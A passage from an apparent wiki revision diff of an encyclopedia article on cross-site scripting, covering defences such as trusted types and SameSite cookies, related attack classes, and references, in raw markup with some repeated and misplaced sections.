Flaws\|website=eWEEK\|date=April 22, 2019 \|access-date=2019-05-01}}</ref><ref name=OR_1>{{cite web\| title=[CSP] On Reporting and Filtering\| last=Akhawe\| first=Devdatta\| url=https://dropbox.tech/security/on-csp-reporting-and-filtering\| publisher=[[Dropbox]]\| date=21 September 2015\| access-date=1 January 2024}}</ref> ===Emerging defensive technologies=== The popularity of [[client-side]] frameworks has changed how attackers craft XSS.<ref>{{Cite journal\|last1=Lekies\|first1=Sebastian\|last2=Kotowicz\|first2=Krzysztof\|last3=Groß\|first3=Samuel\|last4=Nava\|first4=Eduardo Vela\|last5=Johns\|first5=Martin\|date=2017\|title=Code-reuse attacks for the Web: Breaking Cross-Site Scripting Mitigations via Script Gadgets\|url=https://acmccs.github.io/papers/p1709-lekiesA.pdf}}</ref><blockquote>Script gadgets are legitimate JavaScript fragments within an application’s legitimate code base … We demonstrate that these gadgets are omnipresent in almost all modern JavaScript frameworks and present an empirical study showing the prevalence of script gadgets in productive code. As a result, we assume most mitigation techniques in web applications written today can be bypassed.</blockquote>Trusted types<ref>{{Cite web\|url=https://wicg.github.io/trusted-types/dist/spec/\|title=Trusted Types Spec WIP\|website=wicg.github.io\|access-date=2019-05-01}}</ref> changes [[Web API]]s to check that values have been [[Trademark (computer security)\|trademarked]] as trusted.  As long as programs only trademark trustworthy values, an attacker who controls a JavaScript [[String (computer science)\|string value]] cannot cause XSS.  Trusted types are designed to be [[Information security audit\|auditable]] by [[Blue team (computer security)\|blue teams]]. Another defense approach is to use automated tools that will remove XSS malicious code in web pages, these tools use [[static program analysis\|static analysis]] and/or pattern matching methods to identify malicious codes potentially and secure them using methods like escaping.<ref>L. K. Shar and H. B. K. Tan, "Automated removal of cross site scripting vulnerabilities in web applications," ''Information and Software Technology,'' vol. 54, ''(5),'' pp. 467-478, 2012.</ref> ===SameSite cookie parameter=== {{Main\|Same-site cookie}} When a cookie is set with the SameSite=Strict parameter, it is stripped from all cross-origin requests. When set with SameSite=Lax, it is stripped from all non-"safe" cross-origin requests (that is, requests other than GET, OPTIONS, and TRACE which have read-only semantics).<ref>{{Cite web\|url=https://tools.ietf.org/html/draft-west-first-party-cookies-07\|title=Same-site Cookies\|last1=Mark\|first1=Goodwin\|last2=Mike\|first2=West\|website=tools.ietf.org\|language=en\|access-date=2018-05-04}}</ref> The feature is implemented in [[Google Chrome]] since version 63 and [[Firefox]] since version 60.<ref>{{Cite web\|url=https://caniuse.com/#feat=same-site-cookie-attribute\|title=Can I use... Support tables for HTML5, CSS3, etc\|website=caniuse.com\|language=en-US\|access-date=2018-05-04}}</ref> When a cookie is set with the <code>SameSite=Strict</code> parameter, it is stripped from all cross-origin requests. When set with <code>SameSite=Lax</code>, it is stripped from all non-"safe" cross-origin requests (that is, requests other than GET, OPTIONS, and TRACE which have read-only semantics).<ref>{{Cite journal\|url=https://tools.ietf.org/html/draft-west-first-party-cookies-07\|title=Same-site Cookies\|last1=Mark\|first1=Goodwin\|last2=Mike\|first2=West\|website=tools.ietf.org\|date=April 6, 2016 \|language=en\|access-date=2018-05-04}}</ref> The feature is implemented in [[Google Chrome]] since version 63 and [[Firefox]] since version 60.<ref>{{Cite web\|url=https://caniuse.com/#feat=same-site-cookie-attribute\|title=Can I use... Support tables for HTML5, CSS3, etc\|website=caniuse.com\|language=en-US\|access-date=2018-05-04}}</ref> ~~==Related vulnerabilities==~~ In a '''Universal Cross-Site Scripting''' ('''UXSS''', or '''Universal XSS''') attack, vulnerabilities in the browser itself or in the browser plugins are exploited (rather than vulnerabilities in other websites, as is the case with XSS attacks).<ref>{{cite web \|first=Stefano \|last=Di Paola \|title=Adobe Acrobat Reader Plugin - Multiple Vulnerabilities \|url=http://www.wisec.it/vulns.php?page=9 \|date=January 3, 2007 \|publisher=Wisec.it \|access-date=March 13, 2012 }}</ref><ref>{{cite web \|first=Roberto \|last=Suggi Liverani \|title=UXSS in McAfee Endpoint Security, www.mcafee.com and some extra goodies... \|url=http://blog.malerisch.net/2017/04/uxss-mcafee-endpoint-security-and-site-advisor-cve-2016-8011.html \|date=April 26, 2017 \|publisher=blog.malerisch.net \|access-date=May 3, 2017 }}</ref> == Notable incidents == Several classes of vulnerabilities or attack techniques are related to XSS: [[cross-zone scripting]] exploits "zone" concepts in certain browsers and usually executes code with a greater privilege.<ref>{{cite news \|title=Security hole in Internet Explorer allows attackers to execute arbitrary programs \|url=http://www.h-online.com/security/news/item/Security-hole-in-Internet-Explorer-allows-attackers-to-execute-arbitrary-programs-735225.html \|date=May 16, 2008 \|publisher=Heise Media UK \|access-date=June 7, 2008 }}</ref><ref>{{cite web \|first=Roberto \|last=Suggi Liverani \|title=Cross Context Scripting in Firefox \|url=http://www.security-assessment.com/files/whitepapers/Cross_Context_Scripting_with_Firefox.pdf \|date=April 21, 2010 \|publisher=Security-Assessment.com \|access-date=May 3, 2017 \|archive-date=April 28, 2016 \|archive-url=https://web.archive.org/web/20160428170713/http://www.security-assessment.com/files/whitepapers/Cross_Context_Scripting_with_Firefox.pdf \|url-status=dead }}</ref> [[HTTP header injection]] can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as [[HTTP response splitting]]).<ref>{{cite web \|title=Update available for potential HTTP header injection vulnerabilities in Adobe Flash Player \|url=http://www.adobe.com/support/security/bulletins/apsb06-18.html \|date=November 14, 2006 \|publisher=Adobe Systems \|access-date=June 7, 2008 }}</ref> * [[British Airways data breach]] (2018) [[Cross-site request forgery]] (CSRF/XSRF) is almost the opposite of XSS, in that rather than exploiting the user's trust in a site, the attacker (and his malicious page) exploits the site's trust in the client software, submitting requests that the site believes represent conscious and intentional actions of authenticated users.<ref>{{cite web \|last=Auger \|first=Robert \|title=The Cross-Site Request Forgery (CSRF/XSRF) FAQ (version 1.59) \|url=http://www.cgisecurity.com/articles/csrf-faq.shtml \|date=April 17, 2008 \|publisher=Cgisecurity.com \|access-date=June 7, 2008 }}</ref> XSS vulnerabilities (even in other applications running on the same ___domain) allow attackers to bypass CSRF prevention efforts.<ref>{{cite web\|url=http://www.webappsecblog.com/CsrfAndSameOriginXss.html\|title=CSRF and same-origin XSS\|first=Christian\|last=Schneider\|website=www.webappsecblog.com\|access-date=April 21, 2012\|archive-url=https://web.archive.org/web/20120814151512/http://www.webappsecblog.com/CsrfAndSameOriginXss.html\|archive-date=August 14, 2012\|url-status=dead}}</ref> [[Phishing#Covert redirect\|Covert Redirection]] takes advantage of third-party clients susceptible to XSS or Open Redirect attacks.<ref name="Covert_Redirect">{{cite web \|url=https://news.ycombinator.com/item?id=7685677 \|title=OAuth 2.0 and OpenID Redirect Vulnerability \|publisher=Hacker News \|date=May 2, 2014 \|access-date=December 21, 2014 }}</ref> Normal phishing attempts can be easy to spot, because the malicious page's URL will usually be off by a couple of letters from that of the real site. The difference with Covert Redirection is that an attacker could use the real website instead by corrupting the site with a malicious login pop-up dialogue box.<ref name="tomsguide">{{cite news \|url=http://www.tomsguide.com/us/facebook-google-covert-redirect-flaw,news-18726.html \|title=Facebook, Google Users Threatened by New Security Flaw \|publisher=Tom's Guide \|first=Jill \|last=Scharr \|date=May 2, 2014 \|access-date=December 21, 2014 }}</ref> Lastly, [[SQL injection]] exploits a vulnerability in the database layer of an application. When user input is incorrectly filtered, any SQL statements can be executed by the application.<ref>{{cite web \|title=SQL Injection \|url=http://projects.webappsec.org/SQL-Injection \|year=2005 \|publisher=Web Application Security Consortium \|access-date=June 7, 2008 }}</ref><ref>{{cite web \|title=The Cross-Site Scripting FAQ \|url=http://www.cgisecurity.com/xss-faq.html \|year=2002 \|publisher=Cgisecurity.com \|access-date=June 7, 2008 }}</ref> ~~==See also==~~ == See also == [[Web application security]] [[Internet security]] Line 196 ⟶ 146: [[Samy (computer worm)]] [[Parameter validation]] == Footnotes == {{Notelist}} ==References== Line 208 ⟶ 161: [[OWASP]]: [https://owasp.org/www-community/attacks/xss/ XSS], [http://www.owasp.org/index.php/Testing_for_Cross_site_scripting Testing for XSS], [http://www.owasp.org/index.php/Reviewing_Code_for_Cross-site_scripting Reviewing Code for XSS] [http://www.xssed.com/ XSSed: Database of Websites Vulnerable to Cross-Site Scripting Attacks] {{Web interfaces}} {{Information security}} {{DEFAULTSORT:Cross-Site Scripting}} Line 213 ⟶ 170: [[Category:Injection exploits]] [[Category:Hacking (computer security)]] [[Category:Client-side web security exploits]]